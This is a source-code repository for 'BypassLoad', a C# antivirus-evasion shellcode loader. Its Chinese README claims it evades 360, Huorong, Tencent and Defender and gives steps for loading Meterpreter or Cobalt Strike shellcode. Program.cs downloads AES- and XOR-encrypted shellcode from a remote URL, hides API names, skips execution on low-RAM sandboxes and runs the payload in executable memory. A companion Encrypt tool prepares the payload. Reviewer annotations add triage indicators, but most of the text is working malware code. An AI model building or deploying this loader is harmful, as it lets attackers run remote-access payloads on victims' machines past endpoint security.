├── BypassLoad
├── App.config
├── BypassLoad.csproj
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
└── README.md
├── BypassLoad2.0
└── Program.cs
├── Encrypt
├── App.config
├── Encrypt.csproj
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
└── README.md
├── README.md
└── image
├── README.md
├── {4CC0F1A0-4C88-41d0-BA49-9ACAD8486F8C}.png
├── {AB76D9F0-6FF6-424c-BA8C-5AC09209FF61}.png
├── {CB42B60F-F029-46d4-ADF7-B80263FF72B8}.png
└── {CFE2B5D0-BF30-4063-9ADC-6426314F6132}.png
/BypassLoad/App.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/BypassLoad/BypassLoad.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {6BD436FD-275A-4CF6-ABEF-8C717C120253}
8 | WinExe
9 | BypassLoad
10 | BypassLoad
11 | v4.5.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 | true
26 |
27 |
28 | AnyCPU
29 | pdbonly
30 | true
31 | bin\Release\
32 | TRACE
33 | prompt
34 | 4
35 | true
--------------------------------------------------------------------------------
/BypassLoad/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Management;
6 | using System.Net;
7 | using System.Runtime.InteropServices;
8 | using System.Security.Cryptography;
9 | using System.Text;
10 |
11 | namespace TCPMeterpreterProcess
12 | {
13 | class Program
14 | {
/// <summary>
/// The only two statically declared native imports in this file: Kernel32
/// LoadLibrary and GetProcAddress.
/// </summary>
// NOTE(review): every other native routine called in this class is looked up through
// these two functions with a name that is AES-decrypted at run time, so those names
// appear neither as imports nor as plain strings in the compiled assembly. For triage,
// read these two imports together with the Base64 string fields and the calls to
// Marshal.GetDelegateForFunctionPointer.
15 | internal static class Unsafe
16 | {
17 |
18 | [DllImport("Kernel32")]
19 | internal static extern IntPtr GetProcAddress(IntPtr hModule, string procname);
20 | [DllImport("Kernel32")]
21 | internal static extern IntPtr LoadLibrary(string moduleName);
22 | }
// Delegate shapes used with Marshal.GetDelegateForFunctionPointer to call addresses
// returned by GetProcAddress. The export names are stored encrypted, so the mapping from
// delegate to Win32 routine is inferred from the delegate names only: presumably
// WriteProcessMemory, VirtualFree, VirtualAlloc, CreateThread and WaitForSingleObject.
// Write_Process_Memory is declared but never instantiated in this file.
23 | internal delegate bool Write_Process_Memory(
24 | IntPtr hProcess,
25 | IntPtr lpBaseAddress,
26 | byte[] lpBuffer,
27 | uint nSize,
28 | out UIntPtr lpNumberOfBytesWritten);
29 | internal delegate bool Virtual_Free(
30 | IntPtr lpAddress,
31 | uint dwSize,
32 | uint dwFreeType);
// Virtual_Alloc and Create_Thread carry addresses as UInt32 rather than IntPtr.
33 | internal delegate UInt32 Virtual_Alloc(
34 | UInt32 lpStartAddr,
35 | UInt32 size,
36 | UInt32 flAllocationType,
37 | UInt32 flProtect);
38 | internal delegate IntPtr Create_Thread(
39 | UInt32 lpThreadAttributes,
40 | UInt32 dwStackSize,
41 | UInt32 lpStartAddress,
42 | IntPtr param,
43 | UInt32 dwCreationFlags,
44 | ref UInt32 lpThreadId);
45 | internal delegate UInt32 Wait_ForSingle_Object(
46 | IntPtr hHandle,
47 | UInt32 dwMilliseconds
48 | );
// key: AesDecrypt uses Encoding.UTF8.GetBytes(key), so the 24 characters of this Base64
// text are themselves the key bytes (a 192-bit key); the text is never Base64-decoded.
// k, v, c, w: Base64 ciphertexts decrypted with key inside run_1 and passed to
// LoadLibrary (k) and GetProcAddress (v, c, w). Their plaintexts are not shown here.
// NOTE(review): key and ciphertexts are fixed literals, and AesDecrypt uses ECB, so the
// same plaintext always yields the same ciphertext. Unmodified builds therefore carry
// these exact strings, which makes them usable as static indicators.
49 | static string key = "BsijVUv2v+Ql/NM3pQv8uQ==";
50 | static string k = "AyD9Y9zW9dtvfqJzJb33gA==";
51 | static string v = "YlnmzpP5550nqLxW+3wdNQ==";
52 | static string c = "AkJecKOgemBiLxROAtA9WA==";
53 | static string w = "cH9ouyrpylq2wwZqDlf5Uod4zw5Vx+OrGTO0iMg4ah8=";
/// <summary>Entry point: calls run_1 unconditionally; args is not read.</summary>
54 | static void Main(string[] args)
55 | {
56 | run_1();
// run_2 is not defined in this file; a method of that name is in BypassLoad2.0/Program.cs.
57 | //run_2();
58 | }
/// <summary>
/// Checks total physical memory through WMI and, when it is at least 3999 MB, downloads
/// a payload with GetShellCode, copies it into memory obtained through a dynamically
/// resolved allocator, starts a thread at that address and waits on the thread handle.
/// Does nothing further when the memory check fails.
/// </summary>
// NOTE(review): the observable behaviour chain is a WMI query of
// Win32_ComputerSystem.TotalPhysicalMemory, an outbound HTTP GET, an allocation with
// protection 0x40 and a new thread in the same process. The project README calls the
// memory test a simple anti-sandbox check. An analysis VM with less than about 4 GB of
// RAM will see the process exit without network or memory activity, so a quiet sandbox
// run is not evidence that the sample is benign.
59 | private static void run_1()
60 | {
61 |
// Process-wide setting: enables SSL 3.0 and TLS 1.0/1.1 in addition to TLS 1.2.
62 | ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls | SecurityProtocolType.Tls11 | SecurityProtocolType.Tls12 | SecurityProtocolType.Ssl3;
63 | ManagementObjectSearcher searcher = new ManagementObjectSearcher("SELECT TotalPhysicalMemory FROM Win32_ComputerSystem");
64 | double totalMemoryMb = 0;
65 | foreach (ManagementObject obj in searcher.Get())
66 | {
67 | ulong totalMemoryBytes = (ulong)obj["TotalPhysicalMemory"];
// Bytes -> MB using float division; the last row returned wins.
68 | totalMemoryMb = (totalMemoryBytes / 1024f) / 1024f;
69 | }
70 | if (totalMemoryMb >= 3999)
71 | {
72 | byte[] shellcode = GetShellCode();
// Library and export names come from the encrypted fields k, v, c and w.
73 | IntPtr K_handler = Unsafe.LoadLibrary(AesDecrypt(k, key));
74 | IntPtr trva = Unsafe.GetProcAddress(K_handler, AesDecrypt(v, key));
75 |
76 | unhook(K_handler, trva);
77 |
78 | Virtual_Alloc va = (Virtual_Alloc)Marshal.GetDelegateForFunctionPointer(trva, typeof(Virtual_Alloc));
79 | IntPtr trct = Unsafe.GetProcAddress(K_handler, AesDecrypt(c, key));
80 | IntPtr trwf = Unsafe.GetProcAddress(K_handler, AesDecrypt(w, key));
81 |
82 | unhook(K_handler, trct);
83 | unhook(K_handler, trwf);
84 |
85 | Create_Thread ct = (Create_Thread)Marshal.GetDelegateForFunctionPointer(trct, typeof(Create_Thread));
86 | Wait_ForSingle_Object wfoi = (Wait_ForSingle_Object)Marshal.GetDelegateForFunctionPointer(trwf, typeof(Wait_ForSingle_Object));
87 |
// Assuming va resolves to VirtualAlloc (inferred from the delegate name; the export name
// is encrypted): 0x1000 is MEM_COMMIT and 0x40 is PAGE_EXECUTE_READWRITE.
88 | UInt32 mem = va(0, (UInt32)shellcode.Length, 0x1000, 0x40);
89 | Marshal.Copy(shellcode, 0, (IntPtr)(mem), shellcode.Length);
90 | UInt32 threadId = 0;
91 | IntPtr hThread = ct(0, 0, mem, IntPtr.Zero, 0, ref threadId);
// 0xFFFFFFFF is the Win32 INFINITE timeout if wfoi is WaitForSingleObject (inferred).
92 | wfoi(hThread, 0xFFFFFFFF);
93 | }
94 | }
95 |
/// <summary>
/// Reads the first four bytes at <paramref name="inptrfa"/>, copies them into a new
/// unmanaged buffer, resolves one more export from <paramref name="K_handler"/> and
/// calls it as vf(inptrfa, 0, 0).
/// </summary>
/// <param name="K_handler">Module handle returned by LoadLibrary in run_1.</param>
/// <param name="inptrfa">Address of an export returned by GetProcAddress in run_1.</param>
// NOTE(review): the visible code never writes to inptrfa. assemblyBytes and bytesWritten
// are unused, and the AllocHGlobal buffer is neither read again nor freed. The export
// name in Aes_vf is encrypted; the delegate type suggests VirtualFree, but that is an
// inference, and the call's return value is discarded.
96 | private static void unhook(IntPtr K_handler,IntPtr inptrfa)
97 | {
98 | byte[] assemblyBytes = { };
99 | int size = sizeof(int);
100 | byte[] read = new byte[size];
101 | Marshal.Copy(inptrfa, read, 0, size);
102 | UIntPtr bytesWritten = UIntPtr.Zero;
103 |
// A further fixed Base64 ciphertext; like the class-level fields it is a static indicator.
104 | string Aes_vf = "oWoor6Bfv1W3yL4QM0gHMw==";
105 |
106 | IntPtr newMemory = Marshal.AllocHGlobal(read.Length);
107 | Marshal.Copy(read, 0, newMemory, read.Length);
108 | IntPtr vf_add = Unsafe.GetProcAddress(K_handler, AesDecrypt(Aes_vf, key));
109 | Virtual_Free vf = (Virtual_Free)Marshal.GetDelegateForFunctionPointer(vf_add, typeof(Virtual_Free));
110 |
111 | vf(inptrfa, 0, 0);
112 | }
/// <summary>
/// XORs each char of <paramref name="data"/> with a repeating 26-character key, in place.
/// </summary>
/// <param name="data">Characters to transform; the array itself is modified.</param>
/// <returns>The same array instance that was passed in.</returns>
113 | private static char[] Xor_Decrypt(char[] data)
114 | {
// Fixed key literal; the same string appears in Encrypt/Program.cs and BypassLoad2.0/Program.cs.
115 | char[] key = "qwertyuiopasdfghjklzxcvbnm".ToArray();
116 | for (int i = 0; i < data.Length; i++)
117 | {
118 | data[i] ^= key[i % key.Length];
119 | }
120 | return data;
121 | }
122 |
/// <summary>
/// Base64-decodes <paramref name="str"/>, decrypts it with RijndaelManaged in ECB mode
/// with PKCS7 padding, and returns the result decoded as UTF-8.
/// </summary>
/// <param name="str">Base64 ciphertext; null or empty yields null.</param>
/// <param name="key">Key text; its UTF-8 bytes are used directly as the key.</param>
/// <returns>The decrypted text, or null when <paramref name="str"/> is null or empty.</returns>
// NOTE(review): ECB uses no IV and the data is not authenticated, so each ciphertext is a
// fixed function of the key and plaintext. rm and cTransform are not disposed.
123 | private static string AesDecrypt(string str, string key)
124 | {
125 | if (string.IsNullOrEmpty(str)) return null;
126 | Byte[] toEncryptArray = Convert.FromBase64String(str);
127 | RijndaelManaged rm = new RijndaelManaged
128 | {
129 | Key = Encoding.UTF8.GetBytes(key),
130 | Mode = CipherMode.ECB,
131 | Padding = PaddingMode.PKCS7
132 | };
133 | ICryptoTransform cTransform = rm.CreateDecryptor();
134 | Byte[] resultArray = cTransform.TransformFinalBlock(toEncryptArray, 0, toEncryptArray.Length);
135 | return Encoding.UTF8.GetString(resultArray);
136 | }
/// <summary>
/// Reads a URL from webpath.txt in the application base directory, fetches it with an
/// HTTP GET, then AES-decrypts, XOR-decodes and hex-decodes the response body.
/// </summary>
/// <returns>The decoded bytes of the downloaded content.</returns>
// NOTE(review): host and network artefacts visible here are a webpath.txt file next to
// the executable, a GET whose User-Agent is decrypted from a fixed ciphertext, and a
// response body that is Base64 text. The downloaded content is executed by run_1
// without any integrity or origin check. res and stms are not disposed.
137 | private static byte[] GetShellCode()
138 | {
139 | string UserAgent = "/UiTAqd4SYU/cWqwQjNlt/0Slgaba9XvrXGtF4BGV+oI4+geZLyDFVmIWr236HHhnYtLHafUsVMkQbLhcdNw1XPhonbGx5BsjD4fMbiFDLc=";
140 | string path = System.AppDomain.CurrentDomain.SetupInformation.ApplicationBase + "webpath.txt";
141 | string webpath = File.ReadAllText(path, Encoding.UTF8);
142 | HttpWebRequest req = (HttpWebRequest)WebRequest.Create(new Uri(webpath));
143 | req.Method = "GET";
// The key literal is repeated here instead of using the class-level key field.
144 | req.UserAgent = AesDecrypt(UserAgent, "BsijVUv2v+Ql/NM3pQv8uQ==");
145 | HttpWebResponse res = (HttpWebResponse)req.GetResponse();
146 | Stream stms = res.GetResponseStream();
147 | StreamReader reader = new StreamReader(stms, Encoding.UTF8);
148 | string result = reader.ReadToEnd();
149 | reader.Close();
150 | req.Abort();
// Decoding order: Base64 -> AES (ECB) -> repeating-key XOR -> hex text -> bytes.
151 | result = AesDecrypt(result, "BsijVUv2v+Ql/NM3pQv8uQ==");
152 | char[] c_result = result.ToCharArray();
153 | result = new string(Xor_Decrypt(c_result));
154 | byte[] shellcode = HexStringToBytes(result);
155 | return shellcode;
156 | }
/// <summary>
/// Converts hexadecimal text to bytes after removing spaces, "0x"/"0X", "-", ":", ","
/// and "\x"/"\X" wherever they occur.
/// </summary>
/// <param name="hexString">Hex text, optionally with the separators and prefixes above.</param>
/// <returns>One byte per pair of hex digits, in order.</returns>
/// <exception cref="ArgumentException">The cleaned text has an odd number of characters.</exception>
// Convert.ToByte(..., 16) throws FormatException for a pair that is not valid hex.
157 | public static byte[] HexStringToBytes(string hexString)
158 | {
159 | hexString = hexString.Replace(" ", "").Replace("0x", "").Replace("0X", "").Replace("-", "").Replace(":", "").Replace(",", "").Replace(@"\x","").Replace(@"\X", "");
160 | if (hexString.Length % 2 != 0)
161 | throw new ArgumentException();
162 | return Enumerable.Range(0, hexString.Length / 2)
163 | .Select(i => Convert.ToByte(hexString.Substring(i * 2, 2), 16))
164 | .ToArray();
165 | }
166 | }
167 | }
168 |
--------------------------------------------------------------------------------
/BypassLoad/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("BypassLoad")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("BypassLoad")]
13 | [assembly: AssemblyCopyright("Copyright © 2024")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from COM,
19 | // set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
// NOTE(review): this value is compiled into the assembly as a custom attribute and equals
// the GUID listed in BypassLoad.csproj. It stays the same across rebuilds unless edited,
// so it can be used as a static indicator for builds of this project.
23 | [assembly: Guid("6bd436fd-275a-4cf6-abef-8c717c120253")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values, or you can default the Build and Revision numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/BypassLoad/README.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/BypassLoad2.0/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.Linq;
4 | using System.Management;
5 | using System.Net;
6 | using System.Reflection;
7 | using System.Runtime.InteropServices;
8 | using System.Security.Cryptography;
9 | using System.Text;
10 |
11 | namespace TCPMeterpreterProcess
12 | {
13 | class Program
14 | {
/// <summary>
/// The only two statically declared native imports in this file: Kernel32
/// LoadLibrary and GetProcAddress.
/// </summary>
// NOTE(review): the one further native routine used in this file is resolved through
// these two calls with an AES-decrypted name, so it does not appear as an import.
15 | internal static class Unsafe
16 | {
17 |
18 | [DllImport("Kernel32")]
19 | internal static extern IntPtr GetProcAddress(IntPtr hModule, string procname);
20 | [DllImport("Kernel32")]
21 | internal static extern IntPtr LoadLibrary(string moduleName);
22 | }
// Delegate shape for the address resolved in run_2. The export name is encrypted there,
// so the link to the Win32 VirtualProtect routine is inferred from this delegate's name.
23 | internal delegate bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
/// <summary>Entry point: calls run_2 unconditionally; args is not read.</summary>
24 | static void Main(string[] args)
25 | {
26 | run_2();
27 | }
/// <summary>
/// Resolves one native export by an encrypted name and checks total physical memory
/// through WMI. When memory is at least 3999 MB it downloads a payload with GetShellCode,
/// copies it into an AllocHGlobal buffer, changes that buffer's protection to 0x40 and
/// invokes the buffer through an Action delegate.
/// </summary>
// NOTE(review): unlike run_1 in BypassLoad/Program.cs, the library load and export lookup
// happen before the memory check. The behaviour to look for is a protection change to
// execute-read-write on a heap allocation followed by a call into it, preceded by a WMI
// memory query and an HTTP GET. An analysis VM with less than about 4 GB of RAM will not
// reach the download, so a quiet sandbox run is not evidence that the sample is benign.
28 | private static void run_2()
29 | {
// Process-wide setting: enables SSL 3.0 and TLS 1.0/1.1 in addition to TLS 1.2.
30 | ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls | SecurityProtocolType.Tls11 | SecurityProtocolType.Tls12 | SecurityProtocolType.Ssl3;
31 | ManagementObjectSearcher searcher = new ManagementObjectSearcher("SELECT TotalPhysicalMemory FROM Win32_ComputerSystem");
32 | double totalMemoryMb = 0;
// Fixed Base64 ciphertext (k) and key text; AesDecrypt uses the key's UTF-8 bytes directly.
// These literals, and the one on the GetProcAddress line, are static indicators.
33 | string k = "AyD9Y9zW9dtvfqJzJb33gA==";
34 | string key = "BsijVUv2v+Ql/NM3pQv8uQ==";
35 | IntPtr K_handler = Unsafe.LoadLibrary(AesDecrypt(k, key));
36 | IntPtr trvp = Unsafe.GetProcAddress(K_handler, AesDecrypt("3T4eooJx0SrVxuzFC9jxuA==", key));
37 | foreach (ManagementObject obj in searcher.Get())
38 | {
39 | ulong totalMemoryBytes = (ulong)obj["TotalPhysicalMemory"];
// Bytes -> MB using float division; the last row returned wins.
40 | totalMemoryMb = (totalMemoryBytes / 1024f) / 1024f;
41 | }
42 | if (totalMemoryMb >= 3999)
43 | {
44 | byte[] shellcode = GetShellCode();
45 | UInt32 PAGE_EXECUTE_READWRITE = 0x40;
46 | UInt32 oldProtect;
47 | IntPtr mem = Marshal.AllocHGlobal(shellcode.Length);
48 | Marshal.Copy(shellcode, 0, mem, shellcode.Length);
49 | VirtualProtect vp = (VirtualProtect)Marshal.GetDelegateForFunctionPointer(trvp, typeof(VirtualProtect));
50 |
// The return value of vp and oldProtect are not checked or used afterwards.
51 | vp(mem, (UIntPtr)shellcode.Length, PAGE_EXECUTE_READWRITE, out oldProtect);
52 | var shellcodeDelegate = (Action)Marshal.GetDelegateForFunctionPointer(mem, typeof(Action));
53 | shellcodeDelegate();
54 | }
55 | }
/// <summary>
/// Reads a URL from webpath.txt in the application base directory, fetches it with
/// WebRequest, then AES-decrypts, XOR-decodes and hex-decodes the response body.
/// </summary>
/// <returns>The decoded bytes of the downloaded content.</returns>
// NOTE(review): no User-Agent is set in this version. The downloaded content is executed
// by run_2 without any integrity or origin check. The response, stream and reader are
// never closed or disposed.
56 | private static byte[] GetShellCode()
57 | {
58 | string path = System.AppDomain.CurrentDomain.SetupInformation.ApplicationBase + "webpath.txt";
59 | string webpath = File.ReadAllText(path, Encoding.UTF8);
60 | WebRequest request = WebRequest.Create(webpath);
61 | WebResponse response = request.GetResponse();
62 | Stream s = response.GetResponseStream();
63 | StreamReader sr = new StreamReader(s, Encoding.GetEncoding("UTF-8"));
64 | string result = sr.ReadToEnd();
// Decoding order: Base64 -> AES (ECB) -> repeating-key XOR -> hex text -> bytes.
65 | result = AesDecrypt(result, "BsijVUv2v+Ql/NM3pQv8uQ==");
66 | char[] c_result = result.ToCharArray();
67 | result = new string(Xor_Decrypt(c_result));
68 | byte[] shellcode = HexStringToBytes(result);
69 | return shellcode;
70 | }
/// <summary>
/// XORs each char of <paramref name="data"/> with a repeating 26-character key and
/// returns the result in a new array; the input array is left unchanged.
/// </summary>
/// <param name="data">Characters to transform.</param>
/// <returns>A new array of the same length holding the XOR result.</returns>
71 | private static char[] Xor_Decrypt(char[] data)
72 | {
// Fixed key literal; the same string appears in the other two Program.cs files.
73 | char[] key = "qwertyuiopasdfghjklzxcvbnm".ToArray();
74 | char[] encryptedData = new char[data.Length];
75 | for(int i = 0; i < data.Length; i++)
76 | {
77 | encryptedData[i] = (char)(data[i] ^ key[i % key.Length]);
78 | }
79 | return encryptedData;
80 | }
/// <summary>
/// Base64-decodes <paramref name="str"/>, decrypts it with RijndaelManaged in ECB mode
/// with PKCS7 padding, and returns the result decoded as UTF-8.
/// </summary>
/// <param name="str">Base64 ciphertext; null or empty yields null.</param>
/// <param name="key">Key text; its UTF-8 bytes are used directly as the key.</param>
/// <returns>The decrypted text, or null when <paramref name="str"/> is null or empty.</returns>
// NOTE(review): ECB uses no IV and the data is not authenticated, so each ciphertext is a
// fixed function of the key and plaintext. rm and cTransform are not disposed.
81 | private static string AesDecrypt(string str, string key)
82 | {
83 | if (string.IsNullOrEmpty(str)) return null;
84 | Byte[] toEncryptArray = Convert.FromBase64String(str);
85 | RijndaelManaged rm = new RijndaelManaged
86 | {
87 | Key = Encoding.UTF8.GetBytes(key),
88 | Mode = CipherMode.ECB,
89 | Padding = PaddingMode.PKCS7
90 | };
91 | ICryptoTransform cTransform = rm.CreateDecryptor();
92 | Byte[] resultArray = cTransform.TransformFinalBlock(toEncryptArray, 0, toEncryptArray.Length);
93 | return Encoding.UTF8.GetString(resultArray);
94 | }
/// <summary>
/// Converts hexadecimal text to bytes after removing spaces, "0x"/"0X", "-", ":", ","
/// and "\x"/"\X" wherever they occur.
/// </summary>
/// <param name="hexString">Hex text, optionally with the separators and prefixes above.</param>
/// <returns>One byte per pair of hex digits, in order.</returns>
/// <exception cref="ArgumentException">The cleaned text has an odd number of characters.</exception>
// Convert.ToByte(..., 16) throws FormatException for a pair that is not valid hex.
95 | public static byte[] HexStringToBytes(string hexString)
96 | {
97 | hexString = hexString.Replace(" ", "").Replace("0x", "").Replace("0X", "").Replace("-", "").Replace(":", "").Replace(",", "").Replace("\\x","").Replace("\\X","");
98 | if (hexString.Length % 2 != 0)
99 | throw new ArgumentException();
100 | return Enumerable.Range(0, hexString.Length / 2)
101 | .Select(i => Convert.ToByte(hexString.Substring(i * 2, 2), 16))
102 | .ToArray();
103 | }
104 | }
105 | }
--------------------------------------------------------------------------------
/Encrypt/App.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/Encrypt/Encrypt.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {C6CD5D62-40C7-4241-A3FD-F487C0150A90}
8 | Exe
9 | Decrypt
10 | Decrypt
11 | v4.5.2
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
--------------------------------------------------------------------------------
/Encrypt/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.IO;
4 | using System.Linq;
5 | using System.Security.Cryptography;
6 | using System.Text;
7 | using System.Threading.Tasks;
8 |
9 | namespace Encrypt
10 | {
11 | class Program
12 | {
/// <summary>
/// Reads shellcode.txt from the application base directory, applies the repeating-key
/// XOR, AES-encrypts the result with a fixed key, prints the Base64 ciphertext and waits
/// for Enter. args is not read.
/// </summary>
// NOTE(review): this is the encoding counterpart of GetShellCode in the two loader
// projects. The key literal below is the same one hard-coded there, so content produced
// by an unmodified build can be decoded by anyone holding this source.
13 | static void Main(string[] args)
14 | {
15 | string path = System.AppDomain.CurrentDomain.SetupInformation.ApplicationBase;
16 | string shellcode = File.ReadAllText(path + "shellcode.txt", Encoding.UTF8);
17 | shellcode = new string(xor(shellcode));
18 | string D_shellcode = AesEncrypt(shellcode, "BsijVUv2v+Ql/NM3pQv8uQ==");
// The disabled block below would generate a 128-bit AES key and print it as Base64.
19 | /*using (Aes aes = Aes.Create())
20 | {
21 | aes.KeySize = 128;
22 | aes.GenerateKey();
23 | Console.WriteLine(Convert.ToBase64String(aes.Key));
24 | }*/
25 | Console.WriteLine(D_shellcode);
26 | Console.ReadLine();
27 | }
/// <summary>
/// Copies <paramref name="str"/> into a char array and XORs each char with a repeating
/// 26-character key.
/// </summary>
/// <param name="str">Text to transform.</param>
/// <returns>The transformed characters.</returns>
28 | private static char[] xor(string str)
29 | {
30 | char[] data = str.ToArray();
// Fixed key literal; the same string appears in both loader Program.cs files.
31 | char[] key = "qwertyuiopasdfghjklzxcvbnm".ToArray();
32 | for (int i = 0; i < data.Length; i++)
33 | {
34 | data[i] ^= key[i % key.Length];
35 | }
36 |
37 | return data;
38 | }
/// <summary>
/// Encrypts the UTF-8 bytes of <paramref name="str"/> with RijndaelManaged in ECB mode
/// with PKCS7 padding and returns the ciphertext as Base64.
/// </summary>
/// <param name="str">Plaintext; null or empty yields null.</param>
/// <param name="key">Key text; its UTF-8 bytes are used directly as the key.</param>
/// <returns>Base64 ciphertext, or null when <paramref name="str"/> is null or empty.</returns>
// NOTE(review): ECB uses no IV, so the same plaintext and key always give the same
// ciphertext, and the output is not authenticated. rm and cTransform are not disposed.
39 | private static string AesEncrypt(string str, string key)
40 | {
41 | if (string.IsNullOrEmpty(str)) return null;
42 | Byte[] toEncryptArray = Encoding.UTF8.GetBytes(str);
43 |
44 | RijndaelManaged rm = new RijndaelManaged
45 | {
46 | Key = Encoding.UTF8.GetBytes(key),
47 | Mode = CipherMode.ECB,
48 | Padding = PaddingMode.PKCS7
49 | };
50 |
51 | ICryptoTransform cTransform = rm.CreateEncryptor();
52 | Byte[] resultArray = cTransform.TransformFinalBlock(toEncryptArray, 0, toEncryptArray.Length);
53 | return Convert.ToBase64String(resultArray);
54 | }
55 | }
56 | }
57 |
--------------------------------------------------------------------------------
/Encrypt/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
// NOTE(review): the title and product are "Decrypt" although the project folder and the
// namespace in Program.cs are named Encrypt.
8 | [assembly: AssemblyTitle("Decrypt")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Decrypt")]
13 | [assembly: AssemblyCopyright("Copyright © 2024")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from COM,
19 | // set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
// NOTE(review): this value is compiled into the assembly as a custom attribute and equals
// the GUID listed in Encrypt.csproj. It stays the same across rebuilds unless edited,
// so it can be used as a static indicator for builds of this project.
23 | [assembly: Guid("c6cd5d62-40c7-4241-a3fd-f487c0150a90")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values, or you can default the Build and Revision numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Encrypt/README.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # BypassLoad
2 | **通过远程加载AES + XOR异或加密shellcode的免杀加载器,无过多技术细节。**
3 |
4 | | shellcode | 360杀毒 | 火绒 | Defender | 腾讯电脑管家 | VT |
5 | | --------- | -----------| --- | ------- | ------------- | -- |
6 | | Meterpreter | √ | √ | √ | √ | 13/69 |
7 | | Cobalt Strike| √ | √ | √ | √ | 13/69 |
8 |
9 | 推荐Meterpreter生成shellcode,Cobalt Strike在尝试远程加载的shellcode时可能被360拦截
10 |
11 | 可自行`加壳`或`修改`程序尝试
12 |
13 | **releases程序可能会被杀软hash标记,保证免杀效果请自行编译**
14 |
15 | **如果你不知道怎么做,不推荐使用该程序**
16 |
17 | ## 声明:
18 | 1. 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
19 | 2. 水平不高,纯萌新刚刚开始研究免杀,面向Github编程借鉴了很多大佬的代码。
20 | 3. 目前测试通过360、火绒、腾讯电脑管家、Defender。其他自行测试
21 |
22 | ## 使用指南
23 |
24 | 1. 编译BypassLoad和Encrypt
25 | 2. 将shellcode写入shellcode.txt然后运行Encrypt.exe进行加密编码(注意需要手动去除换行)
26 | 3. 将Encrypt.exe加密编码后的数据上传至服务器
27 | 4. 将远程访问链接写入webpath.txt
28 | 5. 运行BypassLoad.exe
29 |
30 | 注意:存在一段if判断内存是否小于4G,进行简单的反沙箱判断。
31 |
32 | ## 更新
33 | 2024年03月11日
34 | 1. 更新2.0:使用 .NET 内置函数替换原先使用的 Windows 函数
35 |
36 | 2024年01月29日
37 | 1. 效果优化,更换加载方式
38 | 2. 不再提供releases,请自行编译
39 |
40 | 2024年01月26日
41 | 1. 效果优化
42 | 2. 请不要将程序放入沙箱,以延长免杀时间
43 |
44 | 2024年01月24日
45 | 1. 效果优化,现已免杀Defender
46 | 2. 现在基于 .NET Framework 4.7.2 框架
47 | 3. 移除了一段无效代码
48 |
--------------------------------------------------------------------------------
/image/README.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/image/{4CC0F1A0-4C88-41d0-BA49-9ACAD8486F8C}.png:
--------------------------------------------------------------------------------
